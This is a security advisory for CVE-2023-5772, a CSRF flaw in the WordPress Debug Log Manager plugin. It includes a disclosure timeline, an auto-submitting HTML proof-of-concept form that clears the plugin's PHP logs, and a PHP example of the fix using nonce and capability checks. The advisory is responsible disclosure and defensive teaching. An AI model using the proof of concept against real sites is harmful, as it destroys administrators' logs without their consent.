During a security assessment of the Debug Log Manager plugin, a CSRF (Cross-Site Request Forgery) vulnerability was identified. It allows an attacker to clear the plugin's PHP logs without proper authorization: the action=clear_log method was found to be vulnerable. It is recommended that the plugin author implement a wp_nonce check for this action.
Main info:

| Field | Value |
| --- | --- |
| CVE | CVE-2023-5772 |
| Plugin | Debug Log Manager |
| Severity | High |
| All-time downloads | 12 969 |
| Active installations | 2000+ |
| Publicly Published | October 28, 2023 |
| Last Updated | October 28, 2023 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5772 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/debug-log-manager/debug-log-manager-220-cross-site-request-forgery |
| Plugin Security Certification by CleanTalk | |
Timeline

| Date | Event |
| --- | --- |
| October 23, 2023 | Plugin testing and vulnerability detection in the Debug Log Manager plugin have been completed |
| October 23, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 27, 2023 | The author fixed the vulnerability and released the plugin update |
| October 28, 2023 | Registered CVE-2023-5772 |
Discovery of the Vulnerability
During testing, a CSRF vulnerability was discovered that leads to clearing the plugin's PHP logs. The action=clear_log method is vulnerable; the plugin author needs to implement a wp_nonce check for it.
Understanding CSRF Attacks
CSRF is a type of attack where a malicious actor tricks a user into performing an unwanted action on a web application in which they are authenticated. In WordPress, CSRF attacks can target various functionalities, including those provided by plugins. In the case of the Debug Log Manager, the CSRF vulnerability allows an attacker to forge a request that, when executed by an authenticated user, triggers the clearing of PHP logs.
Exploiting the CSRF Vulnerability
Exploiting the CSRF vulnerability in the Debug Log Manager involves crafting a malicious web page or script that, when visited by an authenticated user, automatically triggers the action=clear_log method without the user’s knowledge. This can lead to the unintended removal of PHP logs.
PoC code:

```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://your_site/wordpress/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="clear_log" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
___
The potential risk associated with this CSRF vulnerability is significant. An attacker exploiting this vulnerability could trick an authenticated user, such as an administrator, into unknowingly clearing PHP logs. This can disrupt debugging efforts and potentially lead to the loss of valuable information for diagnosing issues.
In a real-world scenario, an attacker might embed malicious code in a website or send a crafted link to a targeted user. If the targeted user, who has administrative privileges, visits the site or clicks the link while authenticated in the WordPress dashboard, the CSRF attack is executed.
Recommendations for Improved Security
To address and mitigate the CSRF vulnerability in the Debug Log Manager plugin, the following recommendations are advised:
- Implementation of Nonce: The plugin author should implement wp_nonce checks for sensitive actions like clearing logs to prevent CSRF attacks.
- Educate Users: Administrators and users should be educated about the risks of clicking on untrusted links and the importance of logging out from their accounts when not in use.
- Security Audits: Conduct regular security audits to identify and remediate vulnerabilities promptly.
By implementing these security measures, administrators can reduce the risk of CSRF attacks and enhance the overall security of their WordPress environment.
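The nonce check recommended above, shown as an added example that is not the plugin's own code: a WordPress admin-ajax handler for action=clear_log in the unprotected shape the advisory describes, then hardened with check_ajax_referer and a capability check, plus the enqueue code that hands the nonce to the plugin's legitimate JavaScript. The nonce action name `dlm_clear_log`, the log file path, the script handle and all function names are assumptions for illustration.

```php
<?php
// Added example (not the Debug Log Manager plugin's code). The hook
// 'wp_ajax_clear_log' matches action=clear_log from the advisory; the
// nonce action 'dlm_clear_log', the log path and function names are assumed.

// Unprotected shape: any request reaching admin-ajax.php with
// action=clear_log runs with the logged-in user's cookies, so a form on a
// third-party page can trigger it without the user's intent.
function example_clear_log_unprotected() {
    $path = WP_CONTENT_DIR . '/debug.log'; // assumed log location
    file_put_contents( $path, '' );
    wp_send_json_success( 'cleared' );
}
// add_action( 'wp_ajax_clear_log', 'example_clear_log_unprotected' );

// Hardened shape: the nonce proves the request came from a page this site
// rendered for this user; the capability check limits who may clear logs.
function example_clear_log_protected() {
    // Sends a 403 and stops when the 'nonce' field is missing or invalid.
    check_ajax_referer( 'dlm_clear_log', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $path = WP_CONTENT_DIR . '/debug.log'; // assumed log location
    file_put_contents( $path, '' );
    wp_send_json_success( 'cleared' );
}
add_action( 'wp_ajax_clear_log', 'example_clear_log_protected' );

// Hand the nonce to the plugin's own admin script. A cross-origin page
// cannot read this value, so it cannot forge a passing request.
function example_enqueue_clear_log_script() {
    wp_enqueue_script(
        'dlm-example',
        plugins_url( 'example.js', __FILE__ ), // assumed script path
        array( 'jquery' ),
        '1.0',
        true
    );
    // Exposes window.dlmExample = { ajaxUrl, nonce } to example.js, which
    // then posts { action: 'clear_log', nonce: dlmExample.nonce } to ajaxUrl.
    wp_localize_script( 'dlm-example', 'dlmExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'dlm_clear_log' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_clear_log_script' );
```

Registering only the `wp_ajax_` hook (not `wp_ajax_nopriv_`) keeps the action unavailable to anonymous visitors, while the nonce and capability checks cover the authenticated-user case the PoC targets.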
DMITRII I.